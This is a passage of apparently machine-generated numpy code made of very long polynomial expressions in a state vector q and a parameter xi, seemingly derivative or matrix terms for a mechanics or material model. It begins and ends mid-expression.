0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(12828156665.2727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])) + (-12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + 1)*(-12828156665.2727*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 2004399.47894886*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*(2*q[3, 0] - q[4, 0] - q[5, 0])**2 + 1) + (-2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 53.3333333333333*q[0, 0] + 26.6666666666667*q[1, 0] + 26.6666666666667*q[2, 0])*(2405279374.73864*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 898984.910836762*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 6320.98765432099*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 30441817.0865359*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 53.3333333333333*q[3, 0] - 26.6666666666667*q[4, 0] - 26.6666666666667*q[5, 0]))*(-160351958.315909*xi**10*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2) - 4.44444444444444*xi**2*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) - 160351958.315909*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 1053.49794238683*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 4.44444444444444*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) + (-160351958.315909*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(-12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + 1) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 4.44444444444444*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)) + (-2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 53.3333333333333*q[0, 0] + 26.6666666666667*q[1, 0] + 26.6666666666667*q[2, 0])*(60131984.3684659*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*q[3, 0] + (1/3)*q[4, 0] + (1/3)*q[5, 0] + 0.15)],
[-160351958.315909*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 4.44444444444444*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) + ((-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(4810558749.47727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[4, 0] - q[5, 0])) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(12828156665.2727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])) + (-38484469995.8182*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 252839.506172839*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1066.66666666667*(q[1, 0] - q[2, 0])**2 + 1)*(-38484469995.8182*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 1217672683.46143*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 23972930.955647*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 252839.506172839*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1066.66666666667*(q[4, 0] - q[5, 0])**2 + 1))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + ((-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(2405279374.73864*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 898984.910836762*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 6320.98765432099*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 30441817.0865359*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 53.3333333333333*q[3, 0] - 26.6666666666667*q[4, 0] - 26.6666666666667*q[5, 0]) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-12828156665.2727*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 2004399.47894886*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 